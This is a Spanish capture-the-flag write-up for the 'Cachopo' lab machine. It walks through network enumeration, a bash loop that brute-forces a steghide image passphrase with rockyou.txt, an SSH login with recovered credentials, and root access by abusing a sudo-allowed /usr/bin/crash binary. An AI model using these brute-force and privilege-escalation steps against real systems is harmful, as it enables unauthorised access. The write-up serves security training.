# TheHackerLabs - Avanzado : [Cachopo]
Table of Contents
📛 Nombre: Cachopo | 📈 Dificultad: Avanzado | 💻 SO: Linux | 👨💻 Creador: Oscar
🕵️ Resolución del CTF Cachopo
Introducción
Cachopo es un CTF avanzado creado por TheHackerLabs, diseñado para desafiar las habilidades de los usuarios experimentados en Linux. El objetivo es identificar servicios vulnerables, explotarlos y capturar la flag final.
🌐 Web oficial del CTF: TheHackersLabs - Cachopo
1. Descubrimiento de la Máquina Objetivo
Iniciamos el desafío identificando la dirección IP de la máquina objetivo en nuestra red local utilizando arp-scan:
# arp-scan -I ens36 --localnet172.18.0.134 00:0c:29:f3:5c:ae VMware, Inc.La IP de la máquina objetivo es 172.18.0.134.
2. Enumeración de Servicios
Realizamos un escaneo completo de puertos utilizando nmap:
# nmap -p- --min-rate 2000 -sS -Pn -oN allports 172.18.0.134Resultados principales:
- 22/tcp: OpenSSH 9.2p1 (Debian)
- 80/tcp: Apache httpd 2.4.61
El análisis del puerto 80 reveló una redirección a http://cachopo.thl/. Configuramos /etc/hosts para incluir el dominio:
# echo "172.18.0.134 cachopo.thl" | tee -a /etc/hosts3. Análisis del Servidor Web y Datos Ocultos
El sitio web contenía una imagen sospechosa. Usamos Steghide para analizarla, pero estaba protegida con contraseña. Realizamos un ataque de fuerza bruta con la lista rockyou.txt:
Script simplificado para fuerza bruta:
#!/bin/bashwhile read password; do steghide --extract -sf cachopo.jpg -p "$password" 2>/dev/null && echo "Contraseña: $password" && breakdone < /usr/share/wordlists/rockyou.txtResultado:
Contraseña: doggiesExtrajimos un archivo que nos redirigió a un directorio oculto con más datos sensibles.
4. Escalación de Privilegios
Nos conectamos al servidor utilizando SSH con las credenciales encontradas y analizamos los permisos del usuario:
# ssh carlos@172.18.0.134# sudo -lUser carlos may run the following commands on Cachopo: (ALL) NOPASSWD: /usr/bin/crashEl binario /usr/bin/crash se explotó para escalar privilegios siguiendo las instrucciones de GTFOBins.
carlos@Cachopo:~$ sudo /usr/bin/crashcrash> !/bin/bashroot@Cachopo:/home/carlos# whoamirootReflexión Final
El CTF Cachopo destaca la importancia de una buena enumeración y el análisis de servicios. Además, pone en práctica habilidades como fuerza bruta y escalación de privilegios. Es un reto ideal para usuarios avanzados que buscan explorar vulnerabilidades reales.
¡Gracias por leer este writeup! Si tienes preguntas, no dudes en contactarme.
Un saludo,
Óscar